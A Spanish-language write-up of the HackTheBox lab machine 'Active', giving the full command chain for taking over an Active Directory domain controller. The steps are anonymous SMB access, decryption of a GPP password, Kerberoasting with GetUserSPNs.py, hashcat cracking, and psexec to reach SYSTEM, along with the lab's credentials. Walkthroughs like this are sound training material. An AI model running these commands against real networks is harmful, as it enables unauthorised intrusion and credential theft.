write-ups / hackthebox / active-htb
HackTheBoxeasyWindows
Active — Kerberoasting en Active Directory
Explotación de Active Directory en la máquina Active de HTB. Enumeración SMB anónima, extracción de credenciales GPP y Kerberoasting para obtener Administrator.
11 de mayo de 20241 min read
HTBActive DirectoryKerberoastingSMBGPP
Reconocimiento
bash
nmap -sV -sC -oN active.nmap 10.10.10.100
Puertos abiertos: 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP), 464 (kpasswd), 636 (LDAPS). Claramente un Domain Controller con Active Directory.
Enumeración SMB
bash
smbclient -N -L //10.10.10.100
El share es accesible sin credenciales. Dentro encontramos archivos de Group Policy Preferences (GPP).
bash
Replicationbash
smbclient -N //10.10.10.100/Replication
cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
get Groups.xml
Credenciales GPP
El archivo contiene una contraseña cifrada con AES-256 de Group Policy Preferences:
bash
Groups.xmlbash
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Credenciales obtenidas:
bash
SVC_TGS:GPPstillStandingStrong2k18Kerberoasting
Con las credenciales del usuario de servicio, realizamos un ataque de Kerberoasting contra Active Directory:
bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Obtenemos el ticket TGS del usuario Administrator. Lo crackeamos:
bash
hashcat -m 13100 ticket.hash /usr/share/wordlists/rockyou.txt
Password:
bash
Ticketmaster1968Acceso como Administrator
bash
psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Shell como .
bash
NT AUTHORITY\SYSTEMFlags
bash
type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt